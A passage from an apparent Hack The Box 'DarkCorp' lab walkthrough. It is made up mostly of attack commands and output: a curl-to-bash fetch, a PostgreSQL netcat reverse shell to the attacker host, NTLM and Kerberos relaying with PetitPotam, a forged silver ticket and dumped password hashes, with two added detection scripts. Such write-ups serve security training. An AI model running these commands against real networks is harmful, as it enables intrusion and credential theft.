445/tcp   open  unknown
5000/tcp  open  unknown
5985/tcp  open  unknown
47001/tcp open  unknown
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown

Just in case we might have missed something, enumerate with linpeas:

ebelford@drip:/tmp$ curl 10.10.14.20/lp.sh|bash|tee /tmp/lp.log
...
╔══════════╣ Hostname, hosts and DNS
drip
127.0.0.1       localhost drip.htb mail.drip.htb dev-a3f1-01.drip.htb

::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

172.16.20.1 DC-01 DC-01.darkcorp.htb darkcorp.htb
172.16.20.3 drip.darkcorp.htb
nameserver 172.16.20.1

search darkcorp.htb
darkcorp.htb
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:143           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:46775         0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:33549         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8001          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:993           0.0.0.0:*               LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
╔══════════╣ Users with console
bcase:x:1000:1000:Bryce Case Jr.,,,:/home/bcase:/bin/bash
ebelford:x:1002:1002:Eugene Belford:/home/ebelford:/bin/bash
postgres:x:102:110:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Searching kerberos conf files and tickets
╚ http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory
kadmin was found on /usr/bin/kadmin
kadmin was found on /usr/bin/kinit
klist execution
klist: No credentials cache found (filename: /tmp/krb5cc_1002)
ptrace protection is disabled (0), you might find tickets inside processes memory
-rw-r--r-- 1 root root 249 Feb  8 17:42 /etc/krb5.conf
[libdefaults]
        default_realm = DARKCORP.HTB
        dns_lookup_realm = true
        dns_lookup_kdc = true

[realms]
        DARKCORP.HTB = {
                kdc = darkcorp.htb
                admin_server = darkcorp.htb
        }

[domain_realm]
        .darkcorp.htb = DARKCORP.HTB
        darkcorp.htb = DARKCORP.HTB
-rw-r--r-- 1 root root 169 Apr 11  2023 /usr/lib/x86_64-linux-gnu/sssd/conf/sssd.conf
[sssd]
domains = shadowutils

[nss]

[pam]

[domain/shadowutils]
id_provider = files

auth_provider = proxy
proxy_pam_target = sssd-shadowutils

proxy_fast_alias = True
tickets kerberos Not Found
klist Not Found

Back to scanning: .1 and .2 are both Windows machines (TTL=128) and we are on Linux (TTL=64). TTL is only a heuristic, since the default can be changed, but the netexec banners below agree.

ebelford@drip:/tmp$ ping -c 1 172.16.20.2
64 bytes from 172.16.20.2: icmp_seq=1 ttl=128 time=0.742 ms
ebelford@drip:/tmp$ ping -c 1 172.16.20.1
64 bytes from 172.16.20.1: icmp_seq=1 ttl=128 time=0.810 ms
ebelford@drip:/tmp$ ping -c 1 172.16.20.3
64 bytes from 172.16.20.3: icmp_seq=1 ttl=64 time=0.029 ms

SMB Enum~

Set up a SOCKS proxy over SSH and try tinkering with the Windows hosts:

└─$ sshpass -p 'ThePlague61780' ssh ebelford@drip.htb -D 127.0.0.1:1080

└─$ proxychains -q netexec smb 172.16.20.2 -u '' -p ''
SMB         172.16.20.2     445    WEB-01           [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:False)
SMB         172.16.20.2     445    WEB-01           [-] darkcorp.htb\: STATUS_ACCESS_DENIED

└─$ proxychains -q netexec smb 172.16.20.2 -u 'guest' -p ''
SMB         172.16.20.2     445    WEB-01           [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:False)
SMB         172.16.20.2     445    WEB-01           [-] darkcorp.htb\guest: STATUS_ACCOUNT_DISABLED

└─$ proxychains -q netexec smb 172.16.20.2 -u 'pleaseletmein' -p ''
SMB         172.16.20.2     445    WEB-01           [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:False)
SMB         172.16.20.2     445    WEB-01           [-] darkcorp.htb\pleaseletmein: STATUS_LOGON_FAILURE

└─$ proxychains -q netexec smb 172.16.20.1 -u '' -p ''
SMB         172.16.20.1     445    DC-01            [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
SMB         172.16.20.1     445    DC-01            [+] darkcorp.htb\:

└─$ proxychains -q netexec smb 172.16.20.1 -u 'guest' -p '' --shares
SMB         172.16.20.1     445    DC-01            [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
SMB         172.16.20.1     445    DC-01            [-] darkcorp.htb\guest: STATUS_ACCOUNT_DISABLED

└─$ proxychains -q netexec smb 172.16.20.1 -u 'pleaseletmein' -p '' --shares
SMB         172.16.20.1     445    DC-01            [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
SMB         172.16.20.1     445    DC-01            [-] darkcorp.htb\pleaseletmein: STATUS_LOGON_FAILURE

The guest account is disabled on both machines and a made-up user fails. The null session (-u '' -p '') is rejected on WEB-01 but accepted on DC-01 ([+] darkcorp.htb\:), which I did not follow up with --shares here.

We are able to SSH to DC-01, but something is strange: we are still on the same box, same file system and everything.

ebelford@drip:/tmp$ ssh ebelford@DC-01
ebelford@drip:~$ id
uid=1002(ebelford) gid=1002(ebelford) groups=1002(ebelford)

There's a web server on .2, which is a default IIS installation. There's also port 5000, but we don't have credentials.

Dirbusting Internal Servers

Writeup-15.png

└─$ proxychains -q feroxbuster -u 'http://172.16.20.2/' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt --thorough -n -D -C 404,403,400 -S 0,1293
301      GET        2l       10w      167c http://172.16.20.2/aspnet_client/system_web => http://172.16.20.2/aspnet_client/system_web/

aspnet_client folder enumeration and fuzzing

└─$ proxychains -q feroxbuster -u 'http://172.16.20.2/aspnet_client/system_web' -w ./aspnet_dirs --thorough -n -D -C 404,403,400 -S 0,1293
301      GET        2l       10w      177c http://172.16.20.2/aspnet_client/system_web/4_0_30319 => http://172.16.20.2/aspnet_client/system_web/4_0_30319/

Permission denied, but probably useful for something?

Postgres Backup

Postgres owns /var/backups/postgres; since the logs contained credentials, something could be in there too.

ebelford@drip:/var/backups$ find / -user postgres 2>/dev/null | grep -vE '^/(run|proc|sys|dev)/'
/etc/postgresql
/etc/postgresql/15
/etc/postgresql/15/main
/etc/postgresql/15/main/environment
/etc/postgresql/15/main/pg_hba.conf
/etc/postgresql/15/main/pg_ident.conf
/etc/postgresql/15/main/pg_ctl.conf
/etc/postgresql/15/main/conf.d
/etc/postgresql/15/main/start.conf
/etc/postgresql/15/main/postgresql.conf
/var/backups/postgres
/var/log/postgresql/postgresql-15-main.log.6.gz
/var/log/postgresql/postgresql-15-main.log.7.gz
/var/log/postgresql/postgresql-15-main.log.5.gz
/var/log/postgresql/postgresql-15-main.log.3.gz
/var/log/postgresql/postgresql-15-main.log.1
/var/log/postgresql/postgresql-15-main.log
/var/log/postgresql/postgresql-15-main.log.4.gz
/var/log/postgresql/postgresql-15-main.log.2.gz
/var/lib/postgresql
/var/lib/postgresql/.local
/var/lib/postgresql/.local/share
/var/lib/postgresql/.gnupg
/var/lib/postgresql/.lesshst
/var/lib/postgresql/15
/var/lib/postgresql/15/main
ebelford@drip:/var/backups$ PGPASSWORD='2Qa2SsBkQvsc' psql -U dripmail_dba -h localhost -p 5432 -d dripmail -c "SELECT pg_ls_dir('/var/backups/postgres');"
        pg_ls_dir
--------------------------
 dev-dripmail.old.sql.gpg
(1 row)

ebelford@drip:/tmp$ PGPASSWORD='2Qa2SsBkQvsc' psql -U dripmail_dba -h localhost -p 5432 -d dripmail -c "COPY (SELECT pg_read_binary_file('/var/backups/postgres/dev-dripmail.old.sql.gpg')) TO '/tmp/dev-dripmail.old.sql.gpg';"
COPY 1

└─$ sshpass -p 'ThePlague61780' scp ebelford@drip.htb:/tmp/dev-dripmail.old.sql.gpg dev-dripmail.old.sql.gpg.hex
└─$ cat dev-dripmail.old.sql.gpg.hex | xxd -r -p > dev-dripmail.old.sql.gpg
└─$ file dev-dripmail.old.sql.gpg
dev-dripmail.old.sql.gpg: PGP RSA encrypted session key - keyid: 11123366 61D8BC1F RSA (Encrypt or Sign) 3072b .
└─$ gpg -d dev-dripmail.old.sql.gpg
gpg: encrypted with RSA key, ID 1112336661D8BC1F
gpg: decryption failed: No secret key

└─$ sshpass -p 'ThePlague61780' scp dev-dripmail.old.sql.gpg ebelford@drip.htb:/tmp/sql.gpg
ebelford@drip:/tmp$ gpg -d sql.gpg
gpg: encrypted with RSA key, ID 1112336661D8BC1F
gpg: decryption failed: No secret key

Looks like we will need a private key to decrypt this file.

Postgres RCE

Postgres allows command execution too!

Writeup-16.png
ebelford@drip:/tmp$ PGPASSWORD='2Qa2SsBkQvsc' psql -U dripmail_dba -h localhost -p 5432 -d dripmail -c "COPY (SELECT '') to PROGRAM 'nc 10.10.14.20 4444 -e /bin/bash'"
(remote) postgres@drip:/var/lib/postgresql/15/main$ id
uid=102(postgres) gid=110(postgres) groups=110(postgres),109(ssl-cert)

(remote) postgres@drip:/var/backups/postgres$ gpg -d dev-dripmail.old.sql.gpg > /tmp/old.sql
# Enter PGPASSWORD

New users

-- Data for Name: Admins; Type: TABLE DATA; Schema: public; Owner: postgres
--

COPY public."Admins" (id, username, password, email) FROM stdin;
1       bcase   dc5484871bc95c4eab58032884be7225        bcase@drip.htb
2   victor.r    cac1c7b0e7008d67b6db40c03e76b9c0    victor.r@drip.htb
3   ebelford    8bbd7f88841b4223ae63c8848969be86    ebelford@drip.htb

Creds: victor.r:victor1gustavo@#

SMB

└─$ proxychains -q netexec smb 172.16.20.1 -u 'victor.r' -p 'victor1gustavo@#' --shares
SMB         172.16.20.1     445    DC-01            [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
SMB         172.16.20.1     445    DC-01            [+] darkcorp.htb\victor.r:victor1gustavo@#
SMB         172.16.20.1     445    DC-01            [*] Enumerated shares
SMB         172.16.20.1     445    DC-01            Share           Permissions     Remark
SMB         172.16.20.1     445    DC-01            -----           -----------     ------
SMB         172.16.20.1     445    DC-01            ADMIN$                          Remote Admin
SMB         172.16.20.1     445    DC-01            C$                              Default share
SMB         172.16.20.1     445    DC-01            CertEnroll      READ            Active Directory Certificate Services share
SMB         172.16.20.1     445    DC-01            IPC$            READ            Remote IPC
SMB         172.16.20.1     445    DC-01            NETLOGON        READ            Logon server share
SMB         172.16.20.1     445    DC-01            SYSVOL          READ            Logon server share

└─$ proxychains -q netexec smb 172.16.20.1 -u 'victor.r' -p 'victor1gustavo@#' -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./

We have some certificates related to DC-01

└─$ tree 172.16.20.1/CertEnroll
172.16.20.1/CertEnroll
├── DARKCORP-DC-01-CA+.crl
├── DARKCORP-DC-01-CA.crl
├── DC-01.darkcorp.htb_DARKCORP-DC-01-CA(1).crt
├── DC-01.darkcorp.htb_DARKCORP-DC-01-CA.crt
└── nsrev_DARKCORP-DC-01-CA.asp

Some ASP code

└─$ cat nsrev_DARKCORP-DC-01-CA.asp
<%
Response.ContentType = "application/x-netscape-revocation"
serialnumber = Request.QueryString
set Admin = Server.CreateObject("CertificateAuthority.Admin")

stat = Admin.IsValidCertificate("DC-01.darkcorp.htb\DARKCORP-DC-01-CA", serialnumber)

if stat = 3 then Response.Write("0") else Response.Write("1") end if
%>

LDAP

└─$ proxychains -q ldapdomaindump  -u 'DARKCORP.HTB\victor.r' -p 'victor1gustavo@#' -dc-ip 172.16.20.1 -o ldap_dump --no-json --no-grep
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
Writeup-17.png

TRUSTED_FOR_DELEGATION is interesting: https://www.netexec.wiki/ldap-protocol/unconstrained-delegation

Writeup-18.png

taylor.b.adm is our next target, since we can RDP/WinRM as her

Get all the users:

└─$ proxychains -q netexec smb 172.16.20.1 -u 'victor.r' -p 'victor1gustavo@#' --rid-brute 10000 | grep SidTypeUser | awk '{split($6, a, "\\"); print(a[2])}' | tee users.txt
Administrator
Guest
krbtgt
DC-01$
victor.r
svc_acc
john.w
angela.w
angela.w.adm
taylor.b
DRIP$

Hmmm... odd. netexec seems to have missed a few accounts? 🤔

Users from ldap:

bryce.c
eugene.b
taylor.b.adm
taylor.b
angela.w.adm
angela.w
john.w
svc_acc
victor.r
krbtgt
Guest
Administrator

HTTP (5000)

Using victor's credentials we can login into the port 5000 application!

Writeup-19.png

NTLM Authentication

I wanted to send requests to Burp, but was unsuccessful because we are already proxying SOCKS5

Writeup-21.png
Writeup-20.png

Authorization attempts were unsuccessful, but it's doing some kind of NTLM authentication...

Turns out you have to enable the NTLM auth in settings: https://portswigger.net/support/configuring-ntlm-with-burp-suite

Writeup-22.png

NTLM Relaying to LDAP

NTLM Relaying to LDAP - The Hail Mary of Network Compromise

└─$ impacket-ntlmrelayx -t "ldap://172.16.20.3" --http-port 8000
└─$ sshpass -p 'victor1gustavo@#' ssh ebelford@drip.htb -R 4444:127.0.0.1:8000
ebelford@drip:~$ ss -a | grep 4444
tcp   LISTEN    0      128                                              127.0.0.1:4444 

This doesn't work because the necessary option is not set in sshd_config:

cat /etc/ssh/sshd_config | grep -i gateway
#GatewayPorts no

# Start chisel
└─$ chisel server -p 36000 --reverse

# Create SOCKS5 proxy
└─$ sshpass -p 'ThePlague61780' scp ./chisel ebelford@drip.htb:/tmp/chisel
ebelford@drip:/tmp$ chmod +x ./chisel
ebelford@drip:/tmp$ /tmp/chisel client 10.10.14.20:36000 R:socks &

# Start the server on remote
└─$ proxychains -q impacket-ntlmrelayx -t "ldap://172.16.20.1" --http-port 8003 --no-smb-server --no-dump --no-da --no-acl --no-validate-privs --interactive

We are essentially replacing SSH with chisel; the path stays the same.

└─$ proxychains -q curl 'http://172.16.20.2:5000/status' --json '{"protocol":"http","host":"drip.darkcorp.htb","port":"8003"}' -u 'victor.r:victor1gustavo@#' --ntlm
{"message":"http://drip.darkcorp.htb:8003 is down (HTTP 401)","status":"Error!"}

We get an interactive LDAP shell \o/

[*] Servers started, waiting for connections
[*] HTTPD(8003): Client requested path: /
[*] HTTPD(8003): Client requested path: /
[*] HTTPD(8003): Client requested path: /
[*] HTTPD(8003): Connection from 127.0.0.1 controlled, attacking target ldap://172.16.20.1
[*] HTTPD(8003): Client requested path: /
[*] HTTPD(8003): Authenticating against ldap://172.16.20.1 as DARKCORP/SVC_ACC SUCCEED
[*] Started interactive Ldap shell via TCP on 127.0.0.1:11000 as DARKCORP/SVC_ACC
└─$ ncat 0 11000
# whoami
u:darkcorp\svc_acc

I think we might need to do a shadow credentials attack, and this is not implemented in impacket for now, I think (speaking from the Mist box)

└─$ git clone https://github.com/Tw1sm/impacket.git -b interactive-ldap-shadow-creds
└─$ cd impacket
└─$ python -m venv venv
└─$ source ./venv/bin/activate
└─$ pip install -e .
└─$ proxychains -q python examples/ntlmrelayx.py -t "ldap://172.16.20.1" --http-port 8003 --no-smb-server --no-dump --no-da --no-acl --no-validate-privs --interactive

Nothing works, permission denied on everything 😭

Previously, bloodhound was not able to dump any data because it failed to find the LDAP server. Turns out you have to add a dnat entry to the proxychains configuration...

└─$ grep ^dnat /etc/proxychains4.conf
dnat 10.129.49.111 172.16.20.1
└─$ proxychains -q bloodhound-python -u 'victor.r' -p 'victor1gustavo@#' -d darkcorp.htb -dc dc-01.darkcorp.htb -ns 172.16.20.1 --zip --dns-tcp -c all

Relaying Kerberos over SMB using krbrelayx

Abusing multicast poisoning for pre-authenticated Kerberos relay over HTTP with Responder and krbrelayx

Relaying Kerberos over SMB using krbrelayx

This is why you RTFM... ntlmrelayx can add DNS records, and svc_acc is a member of the DnsAdmins group, so this action is possible; with that record in place, relaying Kerberos over SMB becomes possible.

└─$ impacket-ntlmrelayx --help
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
LDAP client options:
  --add-dns-record NAME IPADDR
                        Add the <NAME> record to DNS via LDAP pointing to <IPADDR>

The interactive-ldap-shadow-creds branch doesn't have this option; use the latest official source.

chisel server -p 36000 --reverse
sshpass -p 'ThePlague61780' ssh ebelford@drip.htb 'chmod +x /tmp/chisel'
sshpass -p 'ThePlague61780' ssh ebelford@drip.htb '/tmp/chisel client 10.10.14.130:36000 R:socks 8003'

proxychains -q impacket-ntlmrelayx -t 'ldap://172.16.20.1' --http-port 8003 --no-smb-server --no-dump --no-da --no-acl --no-validate-privs -ts --add-dns-record 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.14.130

proxychains -q curl 'http://172.16.20.2:5000/status' -u 'victor.r:victor1gustavo@#' --ntlm --json '{"protocol":"http","host":"drip.darkcorp.htb","port":"8003"}'

Note: proxychains somehow failed to start the server on drip.htb, so forward port 8003 from your machine to drip instead.

Writeup-23.png
└─$ proxychains krbrelayx-krbrelayx -t 'https://dc-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs -v 'WEB-01$' -debug
└─$ proxychains -q /opt/scripts/exploit/PetitPotam/PetitPotam.py -u 'victor.r' -p 'victor1gustavo@#' -d 'darkcorp.htb' 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' WEB-01

Note: you have to perform this attack quickly. Add the DNS record and fire PetitPotam right after (have krbrelayx ready), or it won't work... Probably an HTB cronjob running every 2 seconds or something.

Writeup-24.png

I had to disable dnsmasq so krbrelayx would work 😶
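An added example, written for this page rather than taken from the writeup or from any of the tools above: what a defender can look for in the AD-integrated zone after a step like this. The relay leaves an A record whose name is an existing host name with a long base64 blob appended (the marshalled target information the linked krbrelayx post describes, starting `1UWhRCAAAA` in the `--add-dns-record` command above), and the record points at a machine outside the internal range. The zone contents and the 172.16.20.0/24 range are a constructed sample modelled on the lab, not a real zone export.

```python
"""
Audit AD-integrated DNS A records for the traces a Kerberos-relay DNS record
leaves behind. Constructed sample data; adapt SAMPLE_RECORDS/INTERNAL_NETS to a
real zone export before use.
"""
import ipaddress
import re
from typing import Dict, Iterable, List

# Constructed sample zone (name -> A record): the three lab hosts plus the
# record the relay added, which points at the attacker box.
SAMPLE_RECORDS = {
    "dc-01": "172.16.20.1",
    "web-01": "172.16.20.2",
    "drip": "172.16.20.3",
    "dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA": "10.10.14.130",
}
INTERNAL_NETS = [ipaddress.ip_network("172.16.20.0/24")]  # assumption for this lab

# Start of the base64 blob seen in the --add-dns-record command above.
TARGET_INFO_MARKER = "1UWhRCAAAA"
# A legitimate label is [a-z0-9-]; '+', '/', '=' and a 20+ char base64 run are not.
_BASE64_TAIL = re.compile(r"[A-Za-z0-9+/=]{20,}")


def audit_dns_records(records: Dict[str, str],
                      internal_nets: Iterable[ipaddress.IPv4Network]) -> Dict[str, List[str]]:
    """Return {record name: [reasons]} for every record that looks planted."""
    nets = list(internal_nets)
    findings: Dict[str, List[str]] = {}
    for name, addr in records.items():
        reasons = []
        if TARGET_INFO_MARKER in name:
            reasons.append("name carries the marshalled Kerberos target-info marker")
        # Existing host name + base64 suffix: the shape of a relay record.
        for other in records:
            if other != name and name.startswith(other) and _BASE64_TAIL.fullmatch(name[len(other):]):
                reasons.append(f"name is '{other}' with a base64-looking suffix appended")
                break
        ip = ipaddress.ip_address(addr)
        if not any(ip in net for net in nets):
            reasons.append(f"A record points outside the internal ranges ({addr})")
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in audit_dns_records(SAMPLE_RECORDS, INTERNAL_NETS).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

Feed it a dump of the zone (for example the output of `Get-DnsServerResourceRecord` reduced to name/address pairs) on a schedule; a record that hits all three checks at once is worth an immediate look, and the account that created it is visible in the DNS object's owner and in the directory-service change events if those are audited.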

Pass The Certificate

https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate

└─$ proxychains -q certipy-ad auth -pfx 'WEB-01$.pfx' -dc-ip '172.16.20.1' -username 'WEB-01$' -domain 'darkcorp.htb'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: web-01$@darkcorp.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'web-01.ccache'
[*] Trying to retrieve NT hash for 'web-01$'
[*] Got hash for 'web-01$@darkcorp.htb': aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675

└─$ proxychains -q netexec smb 172.16.20.1 -u 'WEB-01$' -H '8f33c7fc7ff515c1f358e488fbb8b675'
SMB         172.16.20.1     445    DC-01            [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
SMB         172.16.20.1     445    DC-01            [+] darkcorp.htb\WEB-01$:8f33c7fc7ff515c1f358e488fbb8b675

└─$ proxychains -q netexec smb 172.16.20.2 -u 'WEB-01$' -H '8f33c7fc7ff515c1f358e488fbb8b675'
SMB         172.16.20.2     445    WEB-01           [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:False)
SMB         172.16.20.2     445    WEB-01           [+] darkcorp.htb\WEB-01$:8f33c7fc7ff515c1f358e488fbb8b675

The machine account can't do much directly, but we can forge a Silver Ticket and escalate privileges.

Silver Ticket

https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/silver
https://www.netexec.wiki/ldap-protocol/find-domain-sid

└─$ proxychains -q netexec ldap 172.16.20.1 -u 'WEB-01$' -H '8f33c7fc7ff515c1f358e488fbb8b675' --get-sid
SMB         172.16.20.1     445    DC-01            [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
LDAP        172.16.20.1     389    DC-01            [+] darkcorp.htb\WEB-01$:8f33c7fc7ff515c1f358e488fbb8b675
LDAP        172.16.20.1     389    DC-01            Domain SID S-1-5-21-3432610366-2163336488-3604236847
└─$ proxychains -q impacket-ticketer  -nthash "8f33c7fc7ff515c1f358e488fbb8b675" -domain-sid "S-1-5-21-3432610366-2163336488-3604236847" -domain "darkcorp.htb" -spn "cifs/web-01.darkcorp.htb" "Administrator"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for darkcorp.htb/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache

└─$ export KRB5CCNAME=$(readlink -f ./Administrator.ccache)

└─$ klist
Ticket cache: FILE:/home/woyag/Desktop/Rooms/DarkCorp/Administrator.ccache
Default principal: Administrator@DARKCORP.HTB

Valid starting       Expires              Service principal
02/13/2025 13:12:03  02/11/2035 13:12:03  cifs/web-01.darkcorp.htb@DARKCORP.HTB
        renew until 02/11/2035 13:12:03
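Added example, not part of the writeup: the `klist` output above is itself the tell. ticketer mints a ticket valid for ten years, whereas a real KDC honours the domain's Kerberos policy, which by default caps a service ticket at 600 minutes and renewal at 7 days. The script parses MIT `klist` output and flags tickets that violate those limits; the policy values are the Windows defaults and are an assumption here, so adjust them to the domain being checked. The first sample is the klist output from above; the second is a constructed normal ticket.

```python
"""
Parse `klist` output and flag tickets whose lifetime a KDC would never have
granted. Policy limits below are the Default Domain Policy values (assumed).
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional

# Sample input 1: the klist output shown above in the writeup.
SAMPLE_KLIST = """\
Ticket cache: FILE:/home/woyag/Desktop/Rooms/DarkCorp/Administrator.ccache
Default principal: Administrator@DARKCORP.HTB

Valid starting       Expires              Service principal
02/13/2025 13:12:03  02/11/2035 13:12:03  cifs/web-01.darkcorp.htb@DARKCORP.HTB
        renew until 02/11/2035 13:12:03
"""

# Sample input 2 (constructed): a ticket that respects the default policy.
SAMPLE_NORMAL_KLIST = """\
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: victor.r@DARKCORP.HTB

Valid starting       Expires              Service principal
02/13/2025 13:12:03  02/13/2025 23:12:03  krbtgt/DARKCORP.HTB@DARKCORP.HTB
        renew until 02/20/2025 13:12:03
"""

MAX_SERVICE_TICKET_AGE = timedelta(minutes=600)  # "Maximum lifetime for service ticket"
MAX_TICKET_RENEWAL = timedelta(days=7)           # "Maximum lifetime for user ticket renewal"

_TS = r"(\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})"
_TICKET_LINE = re.compile(rf"^{_TS}\s+{_TS}\s+(\S+)$")
_RENEW_LINE = re.compile(rf"renew until\s+{_TS}")


def _ts(text: str) -> datetime:
    return datetime.strptime(text, "%m/%d/%Y %H:%M:%S")


@dataclass
class Ticket:
    starts: datetime
    expires: datetime
    service: str
    renew_until: Optional[datetime] = None


def parse_klist(text: str) -> List[Ticket]:
    """Extract start, expiry, service principal and renew-until from klist output."""
    tickets: List[Ticket] = []
    for raw in text.splitlines():
        line = raw.strip()
        m = _TICKET_LINE.match(line)
        if m:
            tickets.append(Ticket(_ts(m.group(1)), _ts(m.group(2)), m.group(3)))
            continue
        m = _RENEW_LINE.search(line)
        if m and tickets:  # "renew until" belongs to the ticket line just above it
            tickets[-1].renew_until = _ts(m.group(1))
    return tickets


def ticket_anomalies(t: Ticket) -> List[str]:
    """Policy violations that point at a forged ticket; empty list means plausible."""
    findings = []
    lifetime = t.expires - t.starts
    if lifetime > MAX_SERVICE_TICKET_AGE:
        findings.append(f"{t.service}: lifetime {lifetime} exceeds policy {MAX_SERVICE_TICKET_AGE}")
    if t.renew_until is not None and t.renew_until - t.starts > MAX_TICKET_RENEWAL:
        findings.append(f"{t.service}: renewable until {t.renew_until}, beyond the {MAX_TICKET_RENEWAL} policy")
    return findings


if __name__ == "__main__":
    for ticket in parse_klist(SAMPLE_KLIST) + parse_klist(SAMPLE_NORMAL_KLIST):
        for finding in ticket_anomalies(ticket) or [f"{ticket.service}: within policy"]:
            print(finding)
```

Because a silver ticket is never requested from the KDC, there is no 4769 event for it on the DC; the evidence lives in ticket caches collected during response and in the logon events on the service host, which is where a lifetime check like this one applies.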

Web-01 pwned

Dump hashes as Administrator

└─$ proxychains -q impacket-secretsdump -k -no-pass 'DARKCORP.HTB'/'Administrator'@'WEB-01.DARKCORP.HTB' -dc-ip 172.16.20.1
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x4cf6d0e998d53752d088e233abb4bed6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:88d84ec08dad123eb04a060a74053f21:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
DARKCORP.HTB/svc_acc:$DCC2$10240#svc_acc#3a5485946a63220d3c4b118b36361dbb: (2025-02-13 14:10:23)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
darkcorp\WEB-01$:plain_password_hex:4100520044006c002600710072005a00640022007400230061003d004f00520063005e006b006e004f005d00270034004b0041003a003900390074006200320031006a0040005a004f004f005c004b003b00760075006600210063004f0075002f003c0072005d0043004c004a005800250075006c002d00440064005f006b00380038002c00270049002c0046004000680027003b004500200021003b0042004d005f0064003b0066002300700068005500440069002f0054002300320022005f004c0056004c003c0049006f002600480076002c005d00610034005500470077004a0076005f003400740054004800
darkcorp\WEB-01$:aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1004cecdc9b33080d25a4a29126d4590eb555c5f
dpapi_userkey:0x7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472
[*] NL$KM
 0000   DD C9 21 14 B9 23 69 1B  D8 BE FD 57 6B 3C 3E E1   ..!..#i....Wk<>.
